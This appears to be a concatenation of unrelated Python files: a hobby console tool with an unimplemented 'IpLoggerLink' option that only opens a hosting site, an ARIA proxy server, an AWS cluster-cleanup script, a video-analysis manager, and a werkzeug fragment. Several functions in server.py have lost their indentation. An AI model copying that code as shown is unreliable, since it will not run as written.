    MainPage = input(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.MAGENTA + '> Do you want to print your image? y/n:')
    if MainPage == "y":
        print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +'Mainpage')
    else:
        # BUG FIX: the path was previously printed *before* it was assigned,
        # so the stale value from the music step was shown instead.
        # (An unused placeholder `matrix` literal was also removed.)
        path = "C:/Users/Branden/Desktop/Image Project/697033-bigthumbnail.jpg"
        print(f"your path is {path}")
        # Downscale and convert to 8-bit grayscale ("L") for thresholding.
        i = Image.open(path).resize((250, 150)).convert("L")
        plt.imshow(i)
        i = np.array(i)
        plt.show()
        # Threshold at mid-gray. BUG FIX: the old pair of independent `if`s
        # emitted nothing for a pixel exactly equal to 112.5 (unreachable for
        # integer grayscale data, but fragile); use if/else instead.
        for row in i:
            print("".join("#" if pixel > 112.5 else " " for pixel in row))
#Discord(DM)
if option == 2:
    # Placeholder feature.
    print('Hello World')
#Minecraft HandSniperBot
if option == 3:
    # Placeholder feature.
    print('Hello World')
#IpLoggerLink
if option ==4:
    print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.YELLOW+"[AI]+Opening 000webhost Free...")
    time.sleep(3)
    # NOTE(review): webbrowser.open() returns a bool; concatenating it to a
    # str with `+` raises TypeError at runtime — confirm and fix separately.
    print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.YELLOW+"[AI]"+ webbrowser.open('https://000webhost.com/'))
    print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.YELLOW+"[Steps]"+Fore.GREEN+ "Please click Sign In!")
    print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.YELLOW+"[Steps]"+Fore.GREEN+"Press Enter to continue:")
    print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" + Fore.YELLOW +"[Bot]")
    webbrowser.open("https://000webhost.com/")
    # NOTE(review): executable_path is deprecated and
    # find_element_by_link_text was removed in Selenium 4; current Selenium
    # needs webdriver.Chrome(service=...) and find_element(By.LINK_TEXT, ...).
    driver = webdriver.Chrome(executable_path="C:\Program Files (x86)\chromedriver.exe")
    driver.maximize_window()
    driver.get("https://000webhost.com/")
    driver.refresh()
    driver.find_element_by_link_text("LOG IN WITH GOOGLE").click()
    driver.close()
server.py | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
``ctx`` proxy server implementation.
"""
import collections
# from sqlalchemy.orm.collections import mapped_collection
import json
import re
import socket
import threading
import traceback
import Queue
import StringIO
import wsgiref.simple_server
import bottle
from aria import modeling
from .. import exceptions
class CtxProxy(object):
    """HTTP proxy exposing an operation ``ctx`` over a local bottle server (Python 2)."""
    def __init__(self, ctx, ctx_patcher=(lambda *args, **kwargs: None)):
        self.ctx = ctx
        # Callable invoked inside the server thread (thread-local patching).
        self._ctx_patcher = ctx_patcher
        self.port = _get_unused_port()
        self.socket_url = 'http://localhost:{0}'.format(self.port)
        self.server = None
        # Size-1 queue used as a one-shot "server is up" signal.
        self._started = Queue.Queue(1)
        self.thread = self._start_server()
        # Block until the server thread reports readiness (or raise after 5 s).
        self._started.get(timeout=5)
def _start_server(self):
    """Launch the bottle/WSGI proxy server on a daemon thread and return the thread."""

    class BottleServerAdapter(bottle.ServerAdapter):
        # Bound at class-creation time to the enclosing CtxProxy instance.
        proxy = self

        def close_session(self):
            # Return the scoped SQLAlchemy log session to its registry.
            self.proxy.ctx.model.log._session.remove()

        def run(self, app):
            class Server(wsgiref.simple_server.WSGIServer):
                allow_reuse_address = True
                bottle_server = self

                def handle_error(self, request, client_address):
                    # Swallow per-request errors so one bad client can't kill the server.
                    pass

                def serve_forever(self, poll_interval=0.5):
                    try:
                        wsgiref.simple_server.WSGIServer.serve_forever(self, poll_interval)
                    finally:
                        # Once shutdown is called, we need to close the session.
                        # If the session is not closed properly, it might raise warnings,
                        # or even lock the database.
                        self.bottle_server.close_session()

            class Handler(wsgiref.simple_server.WSGIRequestHandler):
                def address_string(self):
                    return self.client_address[0]

                # `self` below resolves through the closure to the adapter's
                # run(), not to the handler — hence the pylint disable.
                def log_request(*args, **kwargs):  # pylint: disable=no-method-argument
                    if not self.quiet:
                        return wsgiref.simple_server.WSGIRequestHandler.log_request(*args, **kwargs)

            server = wsgiref.simple_server.make_server(
                host=self.host,
                port=self.port,
                app=app,
                server_class=Server,
                handler_class=Handler)
            self.proxy.server = server
            # Signal __init__ that the server exists before blocking below.
            self.proxy._started.put(True)
            server.serve_forever(poll_interval=0.1)

    def serve():
        # Since task is a thread_local object, we need to patch it inside the server thread.
        self._ctx_patcher(self.ctx)
        bottle_app = bottle.Bottle()
        bottle_app.post('/', callback=self._request_handler)
        bottle.run(
            app=bottle_app,
            host='localhost',
            port=self.port,
            quiet=True,
            server=BottleServerAdapter)

    thread = threading.Thread(target=serve)
    thread.daemon = True
    thread.start()
    return thread
def close(self):
if self.server:
self.server.shutdown()
self.server.server_close()
def _request_handler(self):
request = bottle.request.body.read() # pylint: disable=no-member
response = self._process(request)
return bottle.LocalResponse(
body=json.dumps(response, cls=modeling.utils.ModelJSONEncoder),
status=200,
headers={'content-type': 'application/json'}
)
def _process(self, request):
try:
with self.ctx.model.instrument(*self.ctx.INSTRUMENTATION_FIELDS):
typed_request = json.loads(request)
args = typed_request['args']
payload = _process_ctx_request(self.ctx, args)
result_type = 'result'
if isinstance(payload, exceptions.ScriptException):
payload = dict(message=str(payload))
result_type = 'stop_operation'
result = {'type': result_type, 'payload': payload}
except Exception as e:
traceback_out = StringIO.StringIO()
traceback.print_exc(file=traceback_out)
payload = {
'type': type(e).__name__,
'message': str(e),
'traceback': traceback_out.getvalue()
}
result = {'type': 'error', 'payload': payload}
return result
def __enter__(self):
return self
def __exit__(self, *args, **kwargs):
self.close()
def _process_ctx_request(ctx, args):
    """Walk ``ctx`` according to ``args`` and return the value reached.

    Each argument is matched, in order, against: an attribute of the
    current object (dashes desugared to underscores), a dotted key path
    in a mapping (read, or write when followed by a value), a callable
    invocation (consuming the remaining args), or a lookup in a
    models-style dict. Raises ``RuntimeError`` for unresolvable args.
    """
    current = ctx
    num_args = len(args)
    index = 0
    while index < num_args:
        arg = args[index]
        attr = _desugar_attr(current, arg)
        if attr:
            current = getattr(current, attr)
        elif isinstance(current, collections.MutableMapping):
            key = arg
            path_dict = _PathDictAccess(current)
            if index + 1 == num_args:
                # read dict prop by path
                value = path_dict.get(key)
                current = value
            elif index + 3 == num_args:
                # set dict prop by path
                value = args[index + 2]
                path_dict.set(key, value)
                current = None
            else:
                raise RuntimeError('Illegal argument while accessing dict')
            break
        elif callable(current):
            kwargs = {}
            remaining_args = args[index:]
            # a trailing mapping is treated as **kwargs for the call
            if isinstance(remaining_args[-1], collections.MutableMapping):
                kwargs = remaining_args[-1]
                remaining_args = remaining_args[:-1]
            current = current(*remaining_args, **kwargs)
            break
        elif arg in current.keys():
            # TODO...check type
            value = current[arg].value
            current = value._wrapped
        else:
            raise RuntimeError('{0} cannot be processed in {1}'.format(arg, args))
        index += 1
    # a no-argument callable at the end of the path is invoked implicitly
    if callable(current):
        current = current()
    return current
def _desugar_attr(obj, attr):
if not isinstance(attr, basestring):
return None
if hasattr(obj, attr):
return attr
attr = attr.replace('-', '_')
if hasattr(obj, attr):
return attr
return None
class _PathDictAccess(object):
pattern = re.compile(r"(.+)\[(\d+)\]")
def __init__(self, obj):
self.obj = obj
def set(self, prop_path, value):
obj, prop_name = self._get_parent_obj_prop_name_by_path(prop_path)
obj[prop_name] = value
def get(self, prop_path):
value = self._get_object_by_path(prop_path)
return value
def _get_object_by_path(self, prop_path, fail_on_missing=True):
# when setting a nested object, make sure to also set all the
# intermediate path objects
current = self.obj
for prop_segment in prop_path.split('.'):
match = self.pattern.match(prop_segment)
if match:
index = int(match.group(2))
property_name = match.group(1)
if property_name not in current:
self._raise_illegal(prop_path)
if not isinstance(current[property_name], list):
self._raise_illegal(prop_path)
current = current[property_name][index]
else:
if prop_segment not in current:
if fail_on_missing:
self._raise_illegal(prop_path)
else:
current[prop_segment] = {}
current = current[prop_segment]
return current
def _get_parent_obj_prop_name_by_path(self, prop_path):
split = prop_path.split('.')
if len(split) == 1:
return self.obj, prop_path
parent_path = '.'.join(split[:-1])
parent_obj = self._get_object_by_path(parent_path, fail_on_missing=False)
prop_name = split[-1]
return parent_obj, prop_name
@staticmethod
def _raise_illegal(prop_path):
raise RuntimeError('illegal path: {0}'.format(prop_path))
def _get_unused_port():
sock = socket.socket()
sock.bind(('127.0.0.1', 0))
_, port = sock.getsockname()
sock.close()
return port
|
cleanup.py | import tempfile
import argparse
import logging
import datetime
import threading
import os
import re
from botocore.exceptions import ClientError
from ocs_ci.framework import config
from ocs_ci.ocs.constants import CLEANUP_YAML, TEMPLATE_CLEANUP_DIR
from ocs_ci.utility.utils import get_openshift_installer, destroy_cluster
from ocs_ci.utility import templating
from ocs_ci.utility.aws import (
AWS, terminate_rhel_workers, destroy_volumes, get_rhel_worker_instances
)
from ocs_ci.cleanup.aws import defaults
FORMAT = (
'%(asctime)s - %(threadName)s - %(name)s - %(levelname)s - %(message)s'
)
logging.basicConfig(format=FORMAT, level=logging.DEBUG)
logger = logging.getLogger(__name__)
def cleanup(cluster_name, cluster_id, upi=False):
    """
    Cleanup existing cluster in AWS

    Renders a minimal metadata.json into a temp dir so that
    ``openshift-install destroy`` can identify the cluster, then removes
    workers, volumes and cloudformation stacks (UPI path) or just runs the
    installer's destroy (IPI path).

    Args:
        cluster_name (str): Name of the cluster
        cluster_id (str): Cluster id to cleanup
        upi (bool): True for UPI cluster, False otherwise

    """
    data = {'cluster_name': cluster_name, 'cluster_id': cluster_id}
    template = templating.Templating(base_path=TEMPLATE_CLEANUP_DIR)
    cleanup_template = template.render_template(CLEANUP_YAML, data)
    cleanup_path = tempfile.mkdtemp(prefix='cleanup_')
    cleanup_file = os.path.join(cleanup_path, 'metadata.json')
    with open(cleanup_file, "w") as temp:
        temp.write(cleanup_template)
    bin_dir = os.path.expanduser(config.RUN['bin_dir'])
    oc_bin = os.path.join(bin_dir, "openshift-install")
    if upi:
        aws = AWS()
        rhel_workers = get_rhel_worker_instances(cleanup_path)
        logger.info(f"{cluster_name}'s RHEL workers: {rhel_workers}")
        if rhel_workers:
            terminate_rhel_workers(rhel_workers)
        # Destroy extra volumes
        destroy_volumes(cluster_name)

        stack_names = list()
        # Get master, bootstrap and security group stacks
        for stack_type in ['ma', 'bs', 'sg']:
            try:
                stack_names.append(
                    aws.get_cloudformation_stacks(
                        pattern=f"{cluster_name}-{stack_type}"
                    )[0]['StackName']
                )
            except ClientError:
                # stack of this type doesn't exist (already gone) -- skip
                continue
        # Get the worker stacks
        worker_index = 0
        worker_stack_exists = True
        while worker_stack_exists:
            try:
                stack_names.append(
                    aws.get_cloudformation_stacks(
                        pattern=f"{cluster_name}-no{worker_index}"
                    )[0]['StackName']
                )
                worker_index += 1
            except ClientError:
                worker_stack_exists = False
        logger.info(f"Deleting stacks: {stack_names}")
        aws.delete_cloudformation_stacks(stack_names)
        # Destroy the cluster
        logger.info(f"cleaning up {cluster_id}")
        destroy_cluster(installer=oc_bin, cluster_path=cleanup_path)
        # Network stacks (inf/vpc) can only be removed after the cluster
        # itself is destroyed.
        # NOTE(review): stack_names still holds the already-deleted stacks
        # from above, so they are passed to delete again here — confirm
        # delete_cloudformation_stacks tolerates missing stacks.
        for stack_type in ['inf', 'vpc']:
            try:
                stack_names.append(
                    aws.get_cloudformation_stacks(
                        pattern=f"{cluster_name}-{stack_type}"
                    )[0]['StackName']
                )
            except ClientError:
                continue
        aws.delete_cloudformation_stacks(stack_names)
    else:
        logger.info(f"cleaning up {cluster_id}")
        destroy_cluster(installer=oc_bin, cluster_path=cleanup_path)
def get_clusters_to_delete(time_to_delete, region_name, prefixes_hours_to_spare):
    """
    Get all cluster names that their EC2 instances running time is greater
    than the specified time to delete

    Args:
        time_to_delete (int): The maximum time in seconds that is allowed
            for clusters to continue running
        region_name (str): The name of the AWS region to delete the resources from
        prefixes_hours_to_spare (dict): Dictionaries of the cluster prefixes to spare
            along with the maximum time in hours that is allowed for spared
            clusters to continue running

    Returns:
        tuple: List of the cluster names (e.g ebenahar-cluster-gqtd4) to be provided to the
            ci-cleanup script and a list of VPCs that are part of cloudformations

    """
    def _without_vpc_suffix(name):
        # BUGFIX: the previous `name.strip('-vpc')` removed any of the
        # characters '-', 'v', 'p', 'c' from BOTH ends (str.strip takes a
        # character set, not a suffix), mangling names such as
        # 'cv-cluster1-vpc' -> 'luster1'. Remove only the literal suffix.
        return name[:-len('-vpc')] if name.endswith('-vpc') else name

    def determine_cluster_deletion(ec2_instances, cluster_name):
        # True if any running instance of the cluster exceeded its allowed
        # running time; per-prefix special rules take precedence.
        for instance in ec2_instances:
            allowed_running_time = time_to_delete
            do_not_delete = False
            if instance.state["Name"] == "running":
                for prefix, hours in prefixes_hours_to_spare.items():
                    # case insensitive 'startswith'
                    if bool(re.match(prefix, cluster_name, re.I)):
                        if hours == 'never':
                            do_not_delete = True
                        else:
                            allowed_running_time = int(hours) * 60 * 60
                        break
                if do_not_delete:
                    logger.info(
                        "%s marked as 'do not delete' and will not be "
                        "destroyed", cluster_name
                    )
                    return False
                else:
                    launch_time = instance.launch_time
                    current_time = datetime.datetime.now(launch_time.tzinfo)
                    running_time = current_time - launch_time
                    logger.info(
                        f"Instance {[tag['Value'] for tag in instance.tags if tag['Key'] == 'Name'][0]} "
                        f"(id: {instance.id}) running time is {running_time} hours while the allowed"
                        f" running time for it is {allowed_running_time/3600} hours"
                    )
                    # BUGFIX: timedelta.seconds wraps at 24 hours (it ignores
                    # the .days component), so clusters running longer than a
                    # day were never flagged; use total_seconds() instead.
                    if running_time.total_seconds() > allowed_running_time:
                        return True
        return False

    aws = AWS(region_name=region_name)
    clusters_to_delete = list()
    cloudformation_vpc_names = list()
    vpcs = aws.ec2_client.describe_vpcs()['Vpcs']
    vpc_ids = [vpc['VpcId'] for vpc in vpcs]
    vpc_objs = [aws.ec2_resource.Vpc(vpc_id) for vpc_id in vpc_ids]
    for vpc_obj in vpc_objs:
        vpc_tags = vpc_obj.tags
        cloudformation_vpc_name = [
            tag['Value'] for tag in vpc_tags if tag['Key'] == defaults.AWS_CLOUDFORMATION_TAG
        ]
        if cloudformation_vpc_name:
            # cloudformation-based (UPI) clusters are handled separately below
            cloudformation_vpc_names.append(cloudformation_vpc_name[0])
            continue
        vpc_name = [tag['Value'] for tag in vpc_tags if tag['Key'] == 'Name'][0]
        cluster_name = _without_vpc_suffix(vpc_name)
        vpc_instances = vpc_obj.instances.all()
        if not vpc_instances:
            clusters_to_delete.append(cluster_name)
            continue
        # Append to clusters_to_delete if cluster should be deleted
        if determine_cluster_deletion(vpc_instances, cluster_name):
            clusters_to_delete.append(cluster_name)

    # Get all cloudformation based clusters to delete
    cf_clusters_to_delete = list()
    for vpc_name in cloudformation_vpc_names:
        instance_dicts = aws.get_instances_by_name_pattern(f"{_without_vpc_suffix(vpc_name)}*")
        ec2_instances = [aws.get_ec2_instance(instance_dict['id']) for instance_dict in instance_dicts]
        if not ec2_instances:
            continue
        cluster_io_tag = None
        for instance in ec2_instances:
            cluster_io_tag = [
                tag['Key'] for tag in instance.tags
                if 'kubernetes.io/cluster' in tag['Key']
            ]
            if cluster_io_tag:
                break
        if not cluster_io_tag:
            logger.warning(
                "Unable to find valid cluster IO tag from ec2 instance tags "
                "for VPC %s. This is probably not an OCS cluster VPC!",
                vpc_name
            )
            continue
        cluster_name = cluster_io_tag[0].replace('kubernetes.io/cluster/', '')
        if determine_cluster_deletion(ec2_instances, cluster_name):
            cf_clusters_to_delete.append(cluster_name)
    return clusters_to_delete, cf_clusters_to_delete
def cluster_cleanup():
    """CLI entry point: destroy the given cluster(s), one thread each.

    Accepts repeated ``--cluster <id>`` arguments and an optional
    ``--upi`` flag that switches to the UPI (cloudformation) deletion path.
    """
    parser = argparse.ArgumentParser(description='Cleanup AWS Resource')
    parser.add_argument(
        '--cluster',
        nargs=1,
        action='append',
        required=True,
        help="Cluster name tag"
    )
    parser.add_argument(
        '--upi',
        action='store_true',
        required=False,
        help="For UPI cluster deletion"
    )
    logging.basicConfig(level=logging.DEBUG)
    args = parser.parse_args()
    procs = []
    for id in args.cluster:
        # each --cluster value arrives as a one-element list (nargs=1);
        # the cluster name is the id minus its random '-<suffix>' part
        cluster_name = id[0].rsplit('-', 1)[0]
        logger.info(f"cleaning up {id[0]}")
        proc = threading.Thread(target=cleanup, args=(cluster_name, id[0], args.upi))
        proc.start()
        procs.append(proc)
    for p in procs:
        p.join()
def aws_cleanup():
    """CLI entry point: delete AWS clusters that ran longer than allowed.

    Collects expired clusters via ``get_clusters_to_delete`` and destroys
    IPI clusters first, then UPI (cloudformation) clusters, each in its
    own thread.
    """
    parser = argparse.ArgumentParser(
        description='AWS overall resources cleanup according to running time'
    )
    parser.add_argument(
        '--hours',
        type=hour_valid,
        action='store',
        required=True,
        help="""
            Maximum running time of the cluster (in hours).
            Clusters older than this will be deleted.
            The minimum is 10 hours
            """
    )
    parser.add_argument(
        '--region',
        action='store',
        required=False,
        help="The name of the AWS region to delete the resources from"
    )
    parser.add_argument(
        '--prefix',
        action='append',
        required=False,
        type=prefix_hour_mapping,
        help="""
            Additional prefix:hour combo to treat as a special rule.
            Clusters starting with this prefix will only be cleaned up if
            their runtime exceeds the provided hour(this takes precedence
            over the value provided to --hours). Note: if you want to skip
            cleanup of a cluster entirely you can use 'never' for the hour.
            Example: --prefix foo:24 --prefix bar:48 --prefix foobar:never
            """
    )
    parser.add_argument(
        '--force',
        action='store_true',
        required=False,
        help="""
            Force cluster cleanup.
            User will not be prompted for confirmation.
            WARNING: this utility is destructive, only use this option if
            you know what you are doing.
            """
    )
    args = parser.parse_args()
    if not args.force:
        confirmation = input(
            'Careful! This action could be highly destructive. '
            'Are you sure you want to proceed? '
        )
        # NOTE(review): `assert` is stripped under `python -O`, which would
        # silently skip this confirmation check — consider an explicit raise.
        assert confirmation == defaults.CONFIRMATION_ANSWER, (
            "Wrong confirmation answer. Exiting"
        )
    prefixes_hours_to_spare = defaults.CLUSTER_PREFIXES_SPECIAL_RULES
    if args.prefix:
        # user-supplied --prefix rules override/extend the defaults
        for prefix, hours in args.prefix:
            logger.info(
                "Adding special rule for prefix '%s' with hours %s",
                prefix, hours
            )
            prefixes_hours_to_spare.update({prefix: hours})
    time_to_delete = args.hours * 60 * 60
    region = defaults.AWS_REGION if not args.region else args.region
    clusters_to_delete, cf_clusters_to_delete = (
        get_clusters_to_delete(
            time_to_delete=time_to_delete, region_name=region,
            prefixes_hours_to_spare=prefixes_hours_to_spare,
        )
    )
    if not clusters_to_delete:
        logger.info("No clusters to delete")
    else:
        logger.info("Deleting clusters: %s", clusters_to_delete)
        # make sure the openshift-install binary is available
        get_openshift_installer()
    procs = []
    for cluster in clusters_to_delete:
        cluster_name = cluster.rsplit('-', 1)[0]
        logger.info(f"Deleting cluster {cluster_name}")
        proc = threading.Thread(target=cleanup, args=(cluster_name, cluster))
        proc.start()
        procs.append(proc)
    for p in procs:
        p.join()
    # UPI clusters go second, with upi=True
    for cluster in cf_clusters_to_delete:
        cluster_name = cluster.rsplit('-', 1)[0]
        logger.info(f"Deleting UPI cluster {cluster_name}")
        proc = threading.Thread(target=cleanup, args=(cluster_name, cluster, True))
        proc.start()
        procs.append(proc)
    for p in procs:
        p.join()
def prefix_hour_mapping(string):
    """
    Validate that the string provided to --prefix is properly formatted

    Args:
        string (str): input provided to --prefix

    Raises:
        argparse.ArgumentTypeError: if the provided string is not
            correctly formatted

    Returns:
        str, str: prefix, hours
    """
    error = argparse.ArgumentTypeError(
        f'{string} is not a properly formatted prefix:hour combination. '
        f'See the --help for more information.'
    )
    parts = string.split(':')
    # exactly one ':' separating two non-empty pieces
    if len(parts) != 2 or not parts[0] or not parts[1]:
        raise error
    prefix, hours = parts
    # 'never' is the only accepted non-integer hour value
    if hours != 'never':
        try:
            int(hours)
        except ValueError:
            raise error
    return prefix, hours
def hour_valid(string):
    """
    Validate that the hour value provided is an int and not lower than the
    minimum allowed running time

    Args:
        string: input provided to --hours

    Raises:
        argparse.ArgumentTypeError: if the provided hours value is not an int
            or lower than the minimum allowed running time

    Returns:
        int: valid hour value
    """
    try:
        hours = int(string)
    except ValueError:
        msg = f'{string} is not an int, please provide an int value'
        raise argparse.ArgumentTypeError(msg)
    # Explicit check instead of `assert`: assertions are stripped when
    # Python runs with -O, which would silently disable this validation.
    if hours < defaults.MINIMUM_CLUSTER_RUNNING_TIME:
        msg = (
            f"Number of hours ({hours}) is lower than the required minimum "
            f"({defaults.MINIMUM_CLUSTER_RUNNING_TIME})."
        )
        raise argparse.ArgumentTypeError(msg)
    return hours
|
Manager.py | import logging
import sys
import threading
from concurrent.futures.process import ProcessPoolExecutor
from concurrent.futures.thread import ThreadPoolExecutor
from rx import create, operators as ops
from rx.subject import Subject
from core.actorClasses.imageAnalyse import ImageAnalyseMock, ImageAnalyse
from core.actorClasses.imageProcessing import ImageProcessingMock, ImageProcessing
from core.actorClasses.outputGenerator import OutputGenerator
from core.dataClasses.frame import Frame
import click
def singleton(class_):
    """
    decorator used as a form of singleton design pattern implementation

    The first call constructs the instance; later calls ignore their
    arguments and return the cached instance.
    :param class_:
    :return:
    """
    instances = {}

    def get_instance(*args, **kwargs):
        # EAFP: cache hit is the common case after the first call
        try:
            return instances[class_]
        except KeyError:
            instances[class_] = class_(*args, **kwargs)
            return instances[class_]
    return get_instance
@singleton
class Manager:
    """Coordinates frame processing, analysis and output generation.

    Singleton facade wiring ImageProcessing -> ThreadPoolExecutor-based
    ImageAnalyse -> OutputGenerator via Rx Subjects.
    """

    def __init__(self, _config):
        """
        default constructor for Manager class
        :param _config: dictionary containing current configuration (from a *config.toml file)
        """
        self._debug = _config['debug']
        self._mock = _config['mock']
        # analyse only every nth frame (performance knob)
        self._nth_analysed = _config['manager']['nth_analysed']
        self._video_input_path = _config['input']['video_input_path']
        # logger declaration
        self.log = logging.getLogger(__name__)
        ch = logging.StreamHandler(stream=sys.stdout)
        if self._debug == 1:
            self.log.setLevel(logging.DEBUG)
        else:
            self.log.setLevel(logging.INFO)
        formatter = logging.Formatter('%(asctime)s|%(threadName)s|%(name)s|%(lineno)d|%(levelname)s|%(message)s',
                                      datefmt='%H:%M:%S')
        ch.setFormatter(formatter)
        self.log.addHandler(ch)
        # end of logger declaration
        self._max_workers = _config['manager']['max_workers']
        self._executor = ThreadPoolExecutor(max_workers=self._max_workers)
        self._futures = []
        self._show_futures_status = _config['logging']['show_futures_status']
        self._log_file_path = _config['output']['log_file_path']
        # Two streams (Subjects) used as communication channels with OutputGenerator
        self._analysed_frames = Subject()
        self._generate_log_status = Subject()
        # status of log generating class instance, currently used only in basic mock test (True=busy)
        self._file_generation_status = True
        if self._mock == 0:
            self._img_processing_class = ImageProcessing
            self._img_analyse_class = ImageAnalyse
        else:
            self.log.warning("MOCK classes are used")
            self._img_processing_class = ImageProcessingMock
            self._img_analyse_class = ImageAnalyseMock
        # self._last_analysed_frame = Frame(-1)
        self.log.info('Path to input file: %s', self._video_input_path)
        self._are_all_processed = False

    def run(self):
        """
        method starts image processing, analysis and output generation.
        It creates appropriate threads for:
        _collect_img_processing: starting processing and collecting images
        _generate_log_file: starting generation of output log file
        :return:
        """
        threading.Thread(target=self._collect_img_processing).start()
        threading.Thread(target=self._generate_log_file).start()

    def _collect_img_processing(self):
        """
        Method creates instance of image processing class.
        Handles all incoming Frames, passing it to ThreadPoolExecutor to be analysed.
        :return:
        """
        _img_processing_instance = self._img_processing_class(self._video_input_path)
        _img_processing_source = create(_img_processing_instance.process)

        def on_complete_processing():
            self.log.info('Img processing has been completed')
            self._are_all_processed = True

        _img_processing_source.pipe(ops.filter(lambda f: self._filter(f))).subscribe(
            on_next=lambda f: self._on_next(f),
            on_error=lambda e: self.log.error(e),
            on_completed=lambda: on_complete_processing()
        )
        # block until every submitted analysis future has finished, then
        # signal downstream consumers that no more frames will arrive
        self._executor.shutdown(wait=True)
        self._futures.clear()
        self._analysed_frames.on_completed()

    def _filter(self, frame: Frame) -> bool:
        """
        filtering method is used by incoming processed images stream.
        It passes every nth frame to be analysed, to optimise program execution.
        Rest of the frames are directly passed to the Output generator instance.
        :param frame: Frame: input Frame
        :return: boolean: based on frame id_ returns True or False
        """
        if frame.id_ % self._nth_analysed == 0:
            frame.is_analysed_ = True
            return True
        # self._last_analysed_frame.id_ = frame.id_
        # frames that skip analysis go straight to the output stream
        self._analysed_frames.on_next(frame)
        return False

    def _on_next(self, frame: Frame):
        """
        Passes incoming processed image (from ImgProcessing) as Frame to self._executor for analysis.
        :param frame: instance of a Frame class
        :return:
        """
        fut = self._executor.submit(self._img_analyse_class.analyse, frame)
        fut.add_done_callback(self._callback)
        self._futures.append(fut)

    def _callback(self, fn):
        """
        callback method is called after each future finishes.
        It sends analysed LicencePlate to self._analysed_frames.
        It also clears associated future and if specified in config logs frame info.
        :param fn: frame returned by _img_analyse_class.analyse
        :return:
        """
        if fn.cancelled():
            self.log.warning('canceled')
            self._analysed_frames.on_error(Exception("Job was cancelled"))
        elif fn.done():
            error = fn.exception()
            if error:
                self.log.error('error returned: {}'.format(error))
                self._analysed_frames.on_error(error)
            else:
                if self._show_futures_status == 1:
                    self.log.info('value returned: {}'.format(fn.result()))
                self._analysed_frames.on_next(fn.result())
        self._futures.remove(fn)

    def _generate_log_file(self):
        """
        It invokes Output Generation process.
        The _generate_log_status is stream (emitter is OutputGenerator) containing status.
        _analysed_frames is stream of analysed Frames with [LicensePlates].
        :return:
        """
        def _switch_status():
            self._file_generation_status = False
            self.log.info("_file_generation_status set to false")

        self._generate_log_status.subscribe(
            on_next=lambda m: self.log.info('Output generator status: {}'.format(m)),
            on_error=lambda e: self.log.error('Output generator error: {}'.format(e)),
            on_completed=lambda: _switch_status(),
        )
        self._file_generation_status = True
        output_gen = OutputGenerator(self._log_file_path, self._analysed_frames, self._generate_log_status)
        output_gen.generate_log_file()

    def mock(self):
        """
        Just for test purposes
        :return:
        """
        return self._max_workers

    def get_status(self):
        """
        DEPRECATED
        TO BE REMOVED IN FUTURE
        :return:
        """
        return self._file_generation_status

    def get_progress(self) -> float:
        """
        Returns number between 0 and 1,
        indicating progress file analysing
        :return: float: between 0 and 1
        """
        # coarse 3-step progress: processing -> generating log -> done-ish
        if self._are_all_processed:
            if self._file_generation_status:
                return 0.6
            return 0.3
        return 0.1

    def _raise_exception(self, e: Exception):
        raise e

    def reset_config(self, video_input_path=None, log_file_path=None):
        """Re-arm the (singleton) manager for another run, optionally with
        new input/output paths; recreates streams, executor and futures."""
        if video_input_path is not None:
            self._video_input_path = video_input_path
        if log_file_path is not None:
            self._log_file_path = log_file_path
        # Two streams (Subjects) used as communication channels with OutputGenerator
        self._analysed_frames = Subject()
        self._generate_log_status = Subject()
        # status of log generating class instance, currently used only in basic mock test (True=busy)
        self._file_generation_status = True
        self._executor = ThreadPoolExecutor(max_workers=self._max_workers)
        self._futures = []
        # self._last_analysed_frame = Frame(-1)
        self.log.info('Path to input file: %s', self._video_input_path)
        self._are_all_processed = False
@click.command()
@click.argument('input_file_path', type=click.Path(exists=True))
@click.argument('output_log_path', type=click.Path(exists=True))
@click.argument('config_path', type=click.Path(exists=True))
def cli_entry(input_file_path, output_log_path, config_path):
    """Run the Manager on INPUT_FILE_PATH, writing the log next to
    OUTPUT_LOG_PATH using the config at CONFIG_PATH."""
    import toml
    with open(config_path) as file:
        config = toml.load(file)
    file_name = ''
    # derive '<input-stem>_log.log' using the same separator style
    # (Windows backslash vs POSIX slash) as the given input path
    if '\\' in input_file_path:
        file_name = input_file_path.split('\\')[-1]
        file_name = '\\' + str(file_name).split('.')[0] + '_log.log'
    else:
        file_name = input_file_path.split('/')[-1]
        file_name = '/' + str(file_name).split('.')[0] + '_log.log'
    config['input']['video_input_path'] = input_file_path
    config['output']['log_file_path'] = output_log_path + file_name
    manager = Manager(config)
    manager.run()
if __name__ == '__main__':
    # Standalone run: load the default config relative to this file.
    import toml
    with open("../../config.toml") as file:
        config = toml.load(file)
    manager = Manager(config)
    manager.run()
|
_reloader.py | import os
import sys
import time
import subprocess
import threading
from itertools import chain
from werkzeug._internal import _log
from werkzeug._compat import PY2, iteritems, text_type
def _iter_module_files():
"""This iterates over all relevant Python files. It goes through all
loaded files from modules, all files in folders of already loaded modules
as well as all files reachable through a package.
"""
# The list call is necessary on Python 3 in case the module
# dictionary modifies during iteration.
for module in list(sys.modules.values()):
if module is None:
continue
filename = getattr(module, '__file__', None)
if filename:
old = None
while not os.path.isfile(filename):
old = filename
filename = os.path.dirname(filename)
if filename == old:
break
else:
if filename[-4:] in ('.pyc', '.pyo'):
